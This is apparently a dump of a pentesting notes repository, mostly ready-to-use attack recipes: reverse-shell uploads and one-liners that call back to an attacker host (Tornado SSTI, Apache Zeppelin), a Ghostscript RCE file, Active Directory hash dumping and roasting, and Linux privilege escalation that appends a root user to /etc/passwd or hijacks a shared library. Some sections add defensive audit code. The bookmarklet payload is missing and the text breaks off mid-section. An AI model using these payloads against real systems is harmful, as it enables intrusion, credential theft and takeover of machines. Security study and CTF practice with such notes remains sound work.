If we can upload a file such as a PHP file, upload a reverse shell script.

```sh
davtest -url http://example.com/davdir -auth 'user:pass' -uploadfile shell.php -uploadloc shell.php
```

### 3. Get a Shell

On the local machine, start a listener to catch the shell.

```sh
nc -lvnp 4444
```

Now access http://example.com/davdir/shell.php.
We should get a shell.

--------------------------------------------------------------------------------
/docs/exploit/web/bookmarklet.md:
--------------------------------------------------------------------------------

# Bookmarklet Attack

If attackers can inject arbitrary JavaScript code into a target website, they can induce victims to run it through a bookmarklet.

## Exploitation

### Malicious Links

Attackers induce victims to add a malicious link to their bookmark menu, as below.

```html
Drag and drop the following link into the bookmark menu to access easily!
Example.com
```

In addition, if the website does not set the **`HttpOnly`** flag on the **`Set-Cookie`** response header, attackers can read the victim's cookie and send it to a malicious website, as below.

```html
Drag and drop the following link into the bookmark menu to access easily!
Example.com
```

## References

- [SOCRadar](https://socradar.io/csp-bypass-unveiled-the-hidden-threat-of-bookmarklets/)

--------------------------------------------------------------------------------
/docs/exploit/windows/active-directory/asrep-roasting.md:
--------------------------------------------------------------------------------

# AS-REP Roasting

AS-REP Roasting is a technique that retrieves crackable password hashes for Active Directory accounts that do not require Kerberos pre-authentication.

## Exploit

List the users for whom Kerberos pre-authentication is not required and request their AS-REP hashes.

```sh
impacket-GetNPUsers example.local/
impacket-GetNPUsers -dc-ip <dc-ip> example.local/ -no-pass -usersfile users.txt
impacket-GetNPUsers -dc-ip <dc-ip> example.local/<username> -no-pass -format hashcat

# Without authentication
netexec ldap <dc-ip> -u users.txt -p '' --asreproast output.txt
# With authentication
netexec ldap <dc-ip> -u username -p password --asreproast output.txt
# With Kerberos authentication (-k)
netexec ldap <dc-ip> -k --asreproast output.txt
```

If we find a password hash, crack it.

```sh
john --format=krb5asrep --wordlist=wordlist.txt hash.txt
# or
hashcat -m 18200 -a 0 hash.txt wordlist.txt
```

--------------------------------------------------------------------------------
/docs/exploit/blockchain/smart-contract/solidity-assembly.md:
--------------------------------------------------------------------------------

# Solidity Assembly

## Simple Example

```solidity
pragma solidity ^0.8.0;

contract Simple {
    constructor(address _addr) {
        bytes memory code;
        assembly {
            // Get the size of the code deployed at _addr
            let size := extcodesize(_addr)
            // Allocate output byte array at the free memory pointer
            code := mload(0x40)
            // New "memory end" including padding
            mstore(0x40, add(code, and(add(add(size, 0x20), 0x1f), not(0x1f))))
            // Store length in memory
            mstore(code, size)
            // Retrieve the code
            extcodecopy(_addr, add(code, 0x20), 0, size)
        }
    }
}
```

## From Opcode

```solidity
pragma solidity ^0.8.0;

contract Opcode {
    constructor() {
        address myContract;
        bytes memory opcode = "\x60\x0a\x60\x0c\x60\x00\x39\x60\x0a\x60\x00\xf3\x60\x2a\x60\x80\x52\x60\x20\x60\x80\xf3";

        assembly {
            // Deploy the raw bytecode held in `opcode` and keep the new address
            myContract := create(0, add(opcode, 0x20), mload(opcode))
        }

        // Some code here...
    }
}
```

--------------------------------------------------------------------------------
/docs/exploit/cryptography/math/quadratic-residue.md:
--------------------------------------------------------------------------------

# Quadratic Residue

## Basic

An integer **`x`** is called a quadratic residue modulo **`p`** if there is an integer **`a`** such that:

```python
a**2 % p == x % p
```

### Brute Force

To list the quadratic residues modulo a small prime by brute force, the following Python script can be used.
```python
p = 71

for a in range(p):
    qr = pow(a, 2, p)
    print(f"a={a} : qr={qr}")
```

### Legendre Symbol

For an odd prime `p`, Euler's criterion gives the value of the Legendre symbol:

```python
# `a` is a quadratic residue and `a != 0 mod p`
a**((p-1)//2) % p == 1

# `a` is a quadratic non-residue mod p (the result is -1 mod p, i.e. p-1)
a**((p-1)//2) % p == p - 1

# `a ≡ 0 mod p`
a**((p-1)//2) % p == 0
```

We can check whether an integer is a quadratic residue by applying the above.

```python
print(pow(a, (p-1)//2, p) == 1)
# If True, `a` is a quadratic residue.
```

## References

- [CryptoHack](https://cryptohack.org/courses/modular/root1/)

--------------------------------------------------------------------------------
/docs/exploit/web/session-fixation.md:
--------------------------------------------------------------------------------

# Session Fixation

Session fixation attacks exploit a weakness in systems that allow one person to fix another person's session identifier.

## Exploitation

### 1. Attacker Logs In to the Website to Get a Session

An attacker needs to log in to the legitimate website and obtain a session value.

```bash
Cookie: sessid=abcdef
```

### 2. Attacker Sends the Session Value to the Victim

There are various ways to deliver the attacker's session value. For example:

- Send an email.
- Predict a session value.
- Eavesdrop on a session using a packet sniffer such as Wireshark.
- XSS

### 3. Victim Logs In with the Attacker's Session

If the victim logs in while the attacker's session value is set in the cookie, the attacker can control the victim's account on the website.
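The defence against the sequence above is to issue a new session identifier at login, so that any identifier planted beforehand stops being valid. As an added Python example that is not from the original notes (the in-memory store, the two `login_*` handlers and the identifiers are all constructed), here is the fixable login beside the mitigated one, driven through the three steps.

```python
import secrets


class SessionStore:
    """Constructed in-memory session store: session id -> attributes."""

    def __init__(self):
        self._sessions = {}

    def new_session(self):
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": None}
        return sid

    def user_for(self, sid):
        """Whoever presents this id is treated as this user (None = anonymous)."""
        session = self._sessions.get(sid)
        return session["user"] if session else None

    def login_fixable(self, presented_sid, user):
        """Vulnerable: binds the user to whatever id the browser presented,
        including one the user never received from this server."""
        self._sessions.setdefault(presented_sid, {"user": None})["user"] = user
        return presented_sid

    def login_rotating(self, presented_sid, user):
        """Mitigated: discard the presented id and issue a fresh one on authentication."""
        self._sessions.pop(presented_sid, None)
        fresh_sid = self.new_session()
        self._sessions[fresh_sid]["user"] = user
        return fresh_sid


def run_fixation(rotate_on_login):
    """Play the three steps from the notes and report what the attacker ends up with."""
    store = SessionStore()
    # 1. attacker obtains a valid session id from the site
    attacker_sid = store.new_session()
    # 2. attacker plants attacker_sid in the victim's browser (email, XSS, ...)
    # 3. victim logs in while presenting the planted id
    login = store.login_rotating if rotate_on_login else store.login_fixable
    victim_sid = login(attacker_sid, "victim")
    # the attacker now replays the id they already know
    return {
        "victim_got_new_id": victim_sid != attacker_sid,
        "attacker_sees_user": store.user_for(attacker_sid),
    }


if __name__ == "__main__":
    print("without rotation:", run_fixation(False))
    print("with rotation:   ", run_fixation(True))
```

Web frameworks usually expose the rotating behaviour as a "regenerate session" call; the key property is that the server only ever honours identifiers it issued itself after authentication.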
31 | 32 | ## References 33 | 34 | - [OWASP](https://owasp.org/www-community/attacks/Session_fixation) 35 | -------------------------------------------------------------------------------- /docs/exploit/cloud/gcp.md: -------------------------------------------------------------------------------- 1 | # GCP (Google Cloud Platform) Pentesting 2 | 3 | ## Install Google Cloud CLI 4 | 5 | Before pentesting GCP, we need to install a dedicated CLI tool. See [the installation guide](https://cloud.google.com/sdk/docs/install) for details. 6 | After installed, login with your Google credential: 7 | 8 | ```bash 9 | gcloud auth login 10 | ``` 11 | 12 |
13 | 14 | ## Google Storage 15 | 16 | Google Storage allows users to store static files in the URL: `https://storage.googleapis.com//`. 17 | We can enumerate the target storage as below: 18 | 19 | ```bash 20 | # Enumerate accessible directories/files from outside. 21 | fuzz -u https://storage.googleapis.com//FUZZ -w wordlist.txt -fc 403 22 | 23 | # Display directories/files 24 | gsutil ls gs:///example/ 25 | 26 | # Download a file 27 | gsutil cp gs:///example.txt 28 | 29 | # Get information for the bucket 30 | gsutil stat gs:///index.html 31 | ``` 32 | 33 | ## References 34 | 35 | - [PwnedLabs](https://pwnedlabs.io/labs/reveal-hidden-files-in-google-storage) 36 | -------------------------------------------------------------------------------- /docs/exploit/web/idor-attack.md: -------------------------------------------------------------------------------- 1 | # IDOR (Insecure Direct Object References) Attack 2 | 3 | IDOR is a type of access control vulnerability in web applications. 4 | 5 | ## Find Vulnerabilities from HTML Source Code 6 | 7 | First check values of attributes on input elements. 8 | 9 | ```html 10 | 11 | ``` 12 | 13 | Then try what will happen when you change the Cookie value in a HTTP header. 
14 | 15 | ```txt 16 | Cookie: user_id=12 17 | ``` 18 | 19 | ## Change GET Parameters 20 | 21 | ### Manual 22 | 23 | ```sh 24 | /user?id=1 25 | /user?id=2 26 | /user?id=-1 27 | /user?id=00 28 | 29 | /admin/posts/1 30 | /admin/posts/-1 31 | /admin/posts/00 32 | 33 | /static/1.txt 34 | /static/2.txt 35 | /static/-1.txt 36 | /static/00.txt 37 | ``` 38 | 39 | ### Automation 40 | 41 | ```sh 42 | seq 0 100 | ffuf -u https://example.com/user?id=FUZZ -w - 43 | 44 | wfuzz -z file,./numbers.txt https://example.com/user?id=FUZZ 45 | ``` 46 | 47 | ## Change POST Parameters 48 | 49 | ```bash 50 | address=1&user_id=1 51 | address=1&user_id=2 52 | 53 | # URL Encode '&' 54 | address=1%26user_id=2 55 | ``` -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Copyright (c) 2022 hdks 2 | 3 | Permission is hereby granted, free of charge, to any person obtaining 4 | a copy of this software and associated documentation files (the 5 | "Software"), to deal in the Software without restriction, including 6 | without limitation the rights to use, copy, modify, merge, publish, 7 | distribute, sublicense, and/or sell copies of the Software, and to 8 | permit persons to whom the Software is furnished to do so, subject to 9 | the following conditions: 10 | 11 | The above copyright notice and this permission notice shall be 12 | included in all copies or substantial portions of the Software. 13 | 14 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, 15 | EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF 16 | MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND 17 | NONINFRINGEMENT. 
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE 18 | LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION 19 | OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION 20 | WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 21 | -------------------------------------------------------------------------------- /docs/exploit/web/clipbucket.md: -------------------------------------------------------------------------------- 1 | # ClipBucket Pentesting 2 | 3 | ClipBucket is a freely downloadable PHP script that will let you start your own Video Sharing website (YouTube Clone). 4 | 5 | ## Arbitrary File Upload < v4.0.0 6 | 7 | ClipBucket versions before 4.0.0 is vulnerable to file upload in ‘uploader’ actions. We can upload arbitrary files so we can execute reverse shell. 8 | 9 | ### 1. Prepare Payload 10 | 11 | Create a PHP script to reverse shell in local machine. 12 | 13 | ```bash 14 | cp /usr/share/webshells/php/php-reverse-shell.php ./shell.php 15 | ``` 16 | 17 | Update $ip and $port with your local ip address and port. 18 | 19 | ### 2. Upload the Payload 20 | 21 | Next upload the above PHP script to the target website. 22 | 23 | ```bash 24 | curl -F "file=@shell.php" -F "plupload=1" -F "name=shell.php" "https://example.com/actions/beats_uploader.php" 25 | ``` 26 | 27 | ### 3. Reverse Shell 28 | 29 | In local machine, start a listener. 30 | 31 | ```bash 32 | nc -lvnp 4444 33 | ``` 34 | 35 | Then access to **`https://example.com/actions/CB_BEATS_UPLOAD_DIR/.php`**. 36 | We should get a shell. 
--------------------------------------------------------------------------------
/docs/exploit/windows/privilege-escalation/manageengine-adselfservice-plus.md:
--------------------------------------------------------------------------------
# ManageEngine ADSelfService Plus PrivEsc

ADSelfService Plus is an integrated Active Directory self-service password management and single sign-on solution that reduces password-related help desk calls. Default ports are 8888 (http) and 9251 (https).

## Directories

```powershell
# Quote the path: it contains spaces and parentheses
dir -Force "\Program Files (x86)\ManageEngine\ADSelfService Plus\"
```

## Unauthenticated SAML RCE (CVE-2022-47966)

Reference: [https://www.rapid7.com/db/modules/exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966/](https://www.rapid7.com/db/modules/exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966/)

```bash
msfconsole
msf> use exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966
msf> set GUID 43ae36f51da65753530a64b37a510a53
msf> set ISSUER_URL http://example.com/adfs/services/trust
msf> set RHOSTS
msf> set RPORT 9251
msf> set LHOST
msf> set LPORT 4444
msf> run
meterpreter> shell
```

--------------------------------------------------------------------------------
/docs/exploit/web/latex-injection.md:
--------------------------------------------------------------------------------
# LaTeX Injection

LaTeX is a software system for document preparation. It may be vulnerable to arbitrary command injection or path traversal.
## Payloads - Read Files

```latex
% Read file
\input{/etc/passwd}
$\input{/etc/passwd}$
$$\input{/etc/passwd}$$

\include{example} % Read example.tex
$\include{example}$
$$\include{example}$$

\lstinputlisting{/etc/passwd}
$\lstinputlisting{/etc/passwd}$
$$\lstinputlisting{/etc/passwd}$$
```

## Payloads - Write File

```latex
\newwrite\outfile
$\newwrite\outfile$
$$\newwrite\outfile$$

\openout\outfile=cmd.tex
$\openout\outfile=cmd.tex$
$$\openout\outfile=cmd.tex$$

\write\outfile{Hello-World}
$\write\outfile{Hello-World}$
$$\write\outfile{Hello-World}$$
```

## References

- [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LaTeX%20Injection)
- [HackTricks](https://book.hacktricks.xyz/pentesting-web/formula-doc-latex-injection#latex-injection)

--------------------------------------------------------------------------------
/docs/exploit/machine-learning/computer-vision/image-manipulation.md:
--------------------------------------------------------------------------------
# Image Manipulation for Machine Learning

We can update each pixel value to change an image.

## Swapping Pixels

This example updates pixel values at specified positions.
```python
import numpy as np
from PIL import Image

img = Image.open("example.png")

# Reshape image data to the desired size for easy processing
# (assumes a 28x28 single-channel image, as in the MNIST-style CTF input)
pixels = np.array(img.getdata())
pixels = np.reshape(pixels, (28, 28))

# Update each pixel with the desired value to change the image
for i in range(img.size[0]):
    for j in range(img.size[1]):
        # change pixel value at position (8, 19)
        if i == 8 and j == 19:
            pixels[i, j] = 255
        # change pixel values from the 25th row, 20th column onwards
        if i > 25 and j > 20:
            pixels[i, j] = np.random.randint(0, 50)

# Convert numpy array back to an image
img_updated = Image.fromarray(pixels.astype(np.uint8))
```

## References

- [Kaggle](https://www.kaggle.com/code/jonbown/ai-ctf-submissions?scriptVersionId=105606691&cellId=102)

--------------------------------------------------------------------------------
/docs/exploit/web/ghostscript.md:
--------------------------------------------------------------------------------
# Ghostscript Pentesting

Ghostscript is an interpreter for the PostScript language and PDF files. It might be vulnerable to code execution.

## Arbitrary Command Execution (CVE-2018-16509) Before v9.24

Reference: [https://github.com/farisv/PIL-RCE-Ghostscript-CVE-2018-16509](https://github.com/farisv/PIL-RCE-Ghostscript-CVE-2018-16509)

If the target website offers functionality that lets users upload image files which are processed with Python's **Pillow (PIL)**, we can execute remote commands through the **Ghostscript** vulnerability (a **`-dSAFER`** bypass using **`OutputFile`**).
Create an image file with the contents below, then upload it. The command will be executed on the target server.
```txt
%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100

userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%touch /tmp/hello.txt) currentdevice putdeviceprops
```

## References

- [SecLists](https://seclists.org/oss-sec/2018/q3/142)

--------------------------------------------------------------------------------
/docs/exploit/linux/privilege-escalation/sudo/tee.md:
--------------------------------------------------------------------------------
# Sudo Tee Privilege Escalation

The `sudo tee` command might be vulnerable to privilege escalation.

## Investigation

```bash
(root) NOPASSWD: /usr/bin/tee
```

If we can execute the **`tee`** command as root, we can escalate privileges.

## Exploitation

### 1. Create a New Password for New User

Assume the new username is "tester".

```sh
# -1: MD5 algorithm
# -salt: Use the provided salt -> the new username here
openssl passwd -1 -salt "tester" "password123"

# Output: $1$tester$LvsygQ2GEt7VUJQEqhMLf/
```

Copy the output password hash.

### 2. Write New Line with Tee

Paste the hash into **`printf`** and append the line to **`/etc/passwd`** using the **`tee`** command (`-a` appends).

```sh
printf 'tester:$1$tester$LvsygQ2GEt7VUJQEqhMLf/:0:0:root:/root:/bin/bash\n' | sudo tee -a /etc/passwd
```

### 3. Switch to New User

Now the new user has been created.
We can switch to the new user.
```sh
su tester
password: password123
```

--------------------------------------------------------------------------------
/docs/exploit/web/framework/tornado.md:
--------------------------------------------------------------------------------
# Tornado Pentesting

Tornado is a Python web server and web application framework.

## Server-Side Template Injection (SSTI)

We can execute arbitrary Python code through server-side template injection.
First check whether template expressions are evaluated, as below.

```bash
Website by {{ 2*3 }}
{{ 2*3 }}

# URL parameters
https://example.com/?q={{2*3}}
```

If the website shows **`6`** instead of **`2*3`**, we can execute arbitrary code.
Try the following payloads.

```bash
{% import os %}{{ os.popen("whoami").read() }}

# Reverse shell. Replace "10.0.0.1" with your own ip
# It requires a listener like `nc -lvnp 4444` in local terminal.
{% import socket,subprocess,os %}{{ s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"]) }}
```

## References

- [ajinabraham](https://ajinabraham.com/blog/server-side-template-injection-in-tornado)

--------------------------------------------------------------------------------
/docs/exploit/web/business-logic-attack.md:
--------------------------------------------------------------------------------
# Business Logic Attack

Business logic is the part of a program that encodes the real-world business rules that determine how data can be created, stored, and changed.
## Change Request Params to Unexpected Values

```sh
productId=-1
productId=a
productId= # empty value

price=-1000
price=1000-
price=%1000
price=%-1000
```

## Exploit Broken Two-Factor

### Brute Force an MFA Code

```http
POST /login HTTP/1.1
Cookie: verify=victim
...

mfa-code=1111
```

## Loop Back with 2,147,483,647

No contents yet.

## Register with an Overly Long Email Address

```http
POST /register HTTP/1.1
...

username=attacker&password=pass1&email=aaaaaaaaaaaaa...aa@vulnerable.com.attacker.com
```

## Remove Specific POST Params

```http
POST /change-password HTTP/1.1
...

username=admin&new-password-1=newpass&new-password-2=newpass
```

--------------------------------------------------------------------------------
/docs/exploit/web/client-server-side-filter-bypass.md:
--------------------------------------------------------------------------------
# Client/Server Side Filter Bypass

If the website uses a filter for validation, we might be able to bypass it by disabling the filter. We can easily do that with Burp Suite's Intercept.

## 1. Disable Filter

### Disable Client-Side (JS) Filter

1. In **Burp Suite**, go to the **Proxy** tab and click **Options**.
2. Navigate to the **Intercept Client Requests** section, click on the top line (**File extension**...), then click **Edit**.
3. A popup will open.
4. In the popup, find and remove `|^js$` in **Match condition**, then save the filter.

### Disable Server-Side Filter

1. In **Burp Suite**, go to the **Proxy** tab and click **Options**.
2. Navigate to the **Intercept Server Requests** section and check **Intercept responses based on...**.

## 2. Drop Filter

After setting up as above, we might be able to bypass the filter by intercepting requests and dropping the filter with the following actions.

1. Turn the intercept on.
2. In the browser, press Ctrl+F5 (hard refresh) to reload the page.
3. If you find the filtering file (.js), drop it.

--------------------------------------------------------------------------------
/docs/exploit/web/ssti.md:
--------------------------------------------------------------------------------
# SSTI (Server-Side Template Injection)

## Automation

- [SSTImap](https://github.com/vladko312/SSTImap)

```sh
./sstimap.py -u https://example.com/?name=test
./sstimap.py -u https://example.com -m POST -d "name=test"
```

## Identify the Template Engine/Framework/Language

|Payload|Template Engine/Framework/Language|
|:---|:---|
|`a{*comment*}b`|Smarty|
|`#{ 2*3 }`|Pug, Spring|
|`*{ 2*3 }`|Spring|
|`${"z".join("ab")}`|Mako, ???|
|`{{ '7'*7 }}`|Angular, Django, Flask, Go, Jinja2, Tornado, Twig, ???|
|`{{:2*3}}`|JsRender|
|`{% debug %}`|Django|
|`<%= 7*7 %>`|ERB (Embedded Ruby)|

## SSTI for Each Framework

Please see each article for details about SSTI.
- [Angular](framework/angular.md)
- [Django](framework/django.md)
- [Flask/Jinja2](framework/flask-jinja2.md)
- [ERB (Embedded Ruby)](erb-ssti.md)
- [Go](go-ssti.md)
- [JsRender](template-engine/jsrender-template-injection.md)
- [Pug](template-engine/pug.md)
- [Spring](framework/spring.md)
- [Tornado](framework/tornado.md)

--------------------------------------------------------------------------------
/docs/exploit/container/docker/moby-docker-engine-privilege-escalation.md:
--------------------------------------------------------------------------------
# Moby Docker Engine Privilege Escalation

## Directory Traversal & Arbitrary Command Execution ([CVE-2021-41091](https://www.suse.com/security/cve/CVE-2021-41091.html))

### 1. Find Docker Container Directory

First off, find the directory where the docker container is mounted.

```bash
findmnt

# Results e.g.
/var/lib/docker/overlay2/abcdef...xyz/merged
```

Assuming the directory above is found, we can investigate it.

```bash
ls -la /var/lib/docker/overlay2/abcdef...xyz/merged/
```

### 2. Prepare SUID Binary in Container

If we can become root inside the docker container, set the setuid bit on an arbitrary binary as below. Note that this must be done in the container, not on the real host.

```bash
chmod u+s /bin/bash
```

### 3. Execute the SUID Binary in Real Host

Back on the real host machine, execute the binary we set the setuid bit on to escalate privileges.

```bash
/var/lib/docker/overlay2/abcdef...xyz/merged/bin/bash -p
```

We should get a root shell.
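An added example, not Moby's code, that audits a Docker data root for the two conditions the CVE-2021-41091 steps above rely on: overlay2 paths that unprivileged host users can traverse, and setuid/setgid files inside a merged layer. `make_demo_root` builds a constructed, deliberately weak layout in a temp directory; on a real host run `audit_docker_root("/var/lib/docker")` as root.

```python
import os
import stat
import tempfile


def traversable_by_others(path: str) -> bool:
    """True if 'other' users have the search (x) bit on this directory."""
    return bool(os.stat(path).st_mode & stat.S_IXOTH)


def audit_docker_root(docker_root: str) -> dict:
    """Report directories an unprivileged host user could traverse on the way
    to a container's merged view, and setuid/setgid files inside that view."""
    findings = {"traversable_dirs": [], "suid_files": []}
    overlay = os.path.join(docker_root, "overlay2")
    if not os.path.isdir(overlay):
        return findings
    # Every directory from the data root down to merged/ must block 'other';
    # one searchable link in the chain is enough for the path to be usable.
    for d in (docker_root, overlay):
        if traversable_by_others(d):
            findings["traversable_dirs"].append(d)
    for layer in sorted(os.listdir(overlay)):
        layer_dir = os.path.join(overlay, layer)
        merged = os.path.join(layer_dir, "merged")
        if not os.path.isdir(merged):
            continue
        for d in (layer_dir, merged):
            if traversable_by_others(d):
                findings["traversable_dirs"].append(d)
        # A `chmod u+s /bin/bash` done inside the container shows up here
        for root, _dirs, files in os.walk(merged):
            for name in files:
                p = os.path.join(root, name)
                st = os.lstat(p)
                if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                    findings["suid_files"].append(p)
    return findings


def make_demo_root() -> str:
    """Constructed, deliberately weak data root in a temp dir (not a real /var/lib/docker)."""
    root = tempfile.mkdtemp()                          # mkdtemp creates it 0700
    bin_dir = os.path.join(root, "overlay2", "abcdef", "merged", "bin")
    os.makedirs(bin_dir)
    os.chmod(os.path.join(root, "overlay2"), 0o755)    # world-searchable: the weak setting
    fake_bash = os.path.join(bin_dir, "bash")
    with open(fake_bash, "wb") as f:
        f.write(b"#!/bin/sh\n")                        # stand-in for the container's /bin/bash
    os.chmod(fake_bash, 0o4755)                        # the setuid bit set inside the container
    return root


if __name__ == "__main__":
    demo = make_demo_root()
    for key, items in audit_docker_root(demo).items():
        print(key, *items, sep="\n  ")
```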
--------------------------------------------------------------------------------
/docs/exploit/linux/privilege-escalation/shared-library-hijacking.md:
--------------------------------------------------------------------------------
# Shared Library Hijacking

## Investigation

When we find a setuid binary or a binary runnable via sudo, check the strings of the binary file.

```bash
strings ./example
strace ./example
gdb ./example

...
foo.so
...
```

If the binary uses a shared library (e.g. **`foo.so`**) and this library can be modified, we can replace it and get a root shell.

```bash
find / -type f -name "foo.so" 2>/dev/null
ls -al /path/to/foo.so

-rwxrwxrwx 1 user user 64 Dec 15 09:13 foo.so
```

## Exploitation

Create **"foo.c"**.

```c
#include <stdlib.h>
#include <unistd.h>

// Replacement for the function the target binary imports from foo.so
void foo() {
    setuid(0);
    setgid(0);
    system("/bin/bash -i");
}
```

Then compile it into a shared object.

```bash
gcc -shared -fPIC -nostartfiles -o foo.so foo.c
```

Put the shared object at **`/path/to/foo.so`**.
Now run the binary.

```bash
./example
# or
sudo ./example
```

We should get a root shell.

--------------------------------------------------------------------------------
/docs/exploit/network/tool/tshark.md:
--------------------------------------------------------------------------------
# Tshark Cheat Sheet

Tshark is the terminal-oriented version of Wireshark. It's a network protocol analyzer.
## Basic Capture

```sh
tshark

# -i: interface (default: eth0)
tshark -i tun0
# --list-interfaces: List the available interfaces
tshark --list-interfaces

# -r: Read from a capture file
tshark -r example.pcapng

# Number of packets
tshark -r example.pcapng | wc -l

# Hex dump
tshark -r example.pcapng --hexdump all
```

## Filtering

We can filter packets using the `-Y` option.

### Protocols

```bash
# HTTP
tshark -Y 'http'

# ICMP
tshark -Y 'icmp'

# TCP/UDP
tshark -Y 'tcp'
tshark -Y 'udp'
```

### IP Address

```bash
tshark -Y 'ip.addr == 127.0.0.1'

# Source address
tshark -Y 'ip.src == 127.0.0.1'

# Destination address
tshark -Y 'ip.dst == 127.0.0.1'
```

## Dump Transferred Data

```bash
tshark -r example.pcapng -T fields -e data -Y "ip.src == 10.0.0.2 and ip.dst == 10.0.0.3" > data.txt
```

--------------------------------------------------------------------------------
/docs/exploit/web/web-server-misconfiguration.md:
--------------------------------------------------------------------------------
# Web Server Security Misconfiguration

Web servers may be configured improperly; if so, we have to reconfigure them properly. This page gives a checklist of likely misconfigurations.

## Checklist

- The admin page allows **non-admin** users to access it.
- **Directory listing** is enabled.
- The test environment is public.
- Default username and password.
- The admin’s password is easy to guess, e.g. **"admin"**, **"password123"**, etc.
- The software is **out of date** or a **vulnerable** version.
- Attacker-friendly error messages are displayed, e.g. they reveal the software version.
- A **cloud service provider (CSP)** has default sharing permissions.
- The insecure `http` protocol is used rather than `https`.

## Check CSP (Content-Security-Policy)

We can check whether the CSP is vulnerable using online tools such as the one below.

- [CSP Evaluator](https://csp-evaluator.withgoogle.com/)

## Security Headers

- [https://securityheaders.com/](https://securityheaders.com/)

## References

- [OWASP](https://owasp.org/Top10/A05_2021-Security_Misconfiguration/)

--------------------------------------------------------------------------------
/docs/exploit/web/apache-zeppelin.md:
--------------------------------------------------------------------------------
# Apache Zeppelin Pentesting

Apache Zeppelin is a web-based notebook that enables data-driven. It uses port 8080 by default.

## Authentication Config File

```bash
/shiro.ini
```

## Default Credentials

```bash
admin:admin
admin:password1
user1:password2
user1:role1
user1:role2
user2:password3
user2:role3
user3:password4
user3:role2
```

## RCE in Notebooks

We can execute remote OS commands in notebooks. Open a notebook and execute the following scripts.

```python
%python

import os

# Configurations
os.system('cat conf/shiro.ini')
```

### Reverse Shell

Before executing the following script, we need to start a listener such as **`nc -lvnp 4444`** on the local machine.
```python
%python

import os,pty,socket;s=socket.socket();s.connect(("10.0.0.1", 4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")
```

## References

- [Apache Zeppelin Docs](https://zeppelin.apache.org/docs/0.8.0/setup/security/shiro_authentication.html)

--------------------------------------------------------------------------------
/docs/exploit/reconnaissance/osint/imint-geoint.md:
--------------------------------------------------------------------------------
# IMINT (Image Intelligence) and GEOINT (Geospatial Intelligence)

IMINT and GEOINT are types of OSINT that reveal the desired information by analyzing images.

## Basic Investigation

```sh
open example.jpg
exiftool example.jpg
```

## Gather Information From Search Engine

Search for the keywords found in the image.

- Name
- Location (country, city, etc.)
- When it opens

## Reverse Image Search

Upload the image to each search engine.

- **[Bing Images](https://www.bing.com/?scope=images)**

- **[Google Images](https://www.google.com/imghp)**

  Click the “Search by image” icon and upload the image.

- **[Yandex Images](http://yandex.com/images)**

## Video (mp4) Geolocation

FFmpeg can extract every single frame from a video.

```bash
# -i: input file
# %06d: followed by six digits e.g. img_000001.png, img_000002.png, etc.
# -hide_banner: hide unnecessary text.
# -r: frame rate (e.g. 1 frame per second)
ffmpeg -i example.mp4 -r 1 img_%06d.png -hide_banner
```

--------------------------------------------------------------------------------
/docs/exploit/linux/privilege-escalation/sudo/vim.md:
--------------------------------------------------------------------------------
# Sudo Vim Privilege Escalation

The `sudo vim` command might be vulnerable to privilege escalation (PrivEsc).

## Investigation

```sh
sudo -l

(ALL) NOPASSWD: vim example.txt
```

If we can execute the **"vim"** command as root, we can execute shell commands from the vim editor.

## Exploitation

Simply run the **"vim"** command as root.

```sh
sudo vim example.txt
```

In the Vim editor, we can run shell commands as root.

```sh
:r!whoami
```

### Options

```sh
# Read environment variables
# - We can list them by entering [tab] key after `:echo $`.
:echo $PATH

# Read another file
:read /etc/passwd

# Edit another file
:edit /etc/passwd

# Execute Python script
:py import os;os.execl("/bin/sh", "sh", "-c", "reset; exec sh")
:py3 import os;os.execl("/bin/sh", "sh", "-c", "reset; exec sh")
# Enumeration
:py3 import os;print(os.listdir("/"))
# Write file from another file
:py3 open("/tmp/new_file", "wb").write(open("/tmp/original_file", "rb").read())
```

--------------------------------------------------------------------------------
/docs/exploit/windows/privilege-escalation/dumping-windows-password-hashes.md:
--------------------------------------------------------------------------------
# Dumping Windows Password Hashes

Using Impacket's SecretsDump, we can dump Windows password hashes.
## Commands

### Using Credentials

```sh
impacket-secretsdump example.local/username:password@

# -just-dc: Extract only NTDS.DIT (NTLM hashes and kerberos keys).
impacket-secretsdump -just-dc example.local/username:password@
# -just-dc-ntlm: Extract only NTDS.DIT data (NTLM hashes only).
impacket-secretsdump -just-dc-ntlm example.local/username:password@
```

### Using NTDS file or Hives

```sh
# -ntds: NTDS.DIT file to parse
# -system: SYSTEM hive to parse
impacket-secretsdump -ntds ntds.dit -system system LOCAL

# -sam: SAM hive to parse
# -security: SECURITY hive to parse
# -system: SYSTEM hive to parse
impacket-secretsdump -sam sam.bak -security security.bak -system system.bak LOCAL
```

After dumping, we can crack the hashes to reveal passwords or use them with **Pass-The-Hash**.

## References

- [WADComs](https://wadcoms.github.io/wadcoms/Impacket-SecretsDump/)

--------------------------------------------------------------------------------
/docs/exploit/linux/privilege-escalation/apache-conf.md:
--------------------------------------------------------------------------------
# Apache Conf Privilege Escalation

## Investigation

```bash
ls -al /etc/apache2

-rwxrwxrwx 1 root root 7094 NOV 7 2023 apache2.conf
```

If we can modify the apache configuration file, we can change the web user (www-data) to an arbitrary user.

## Exploitation

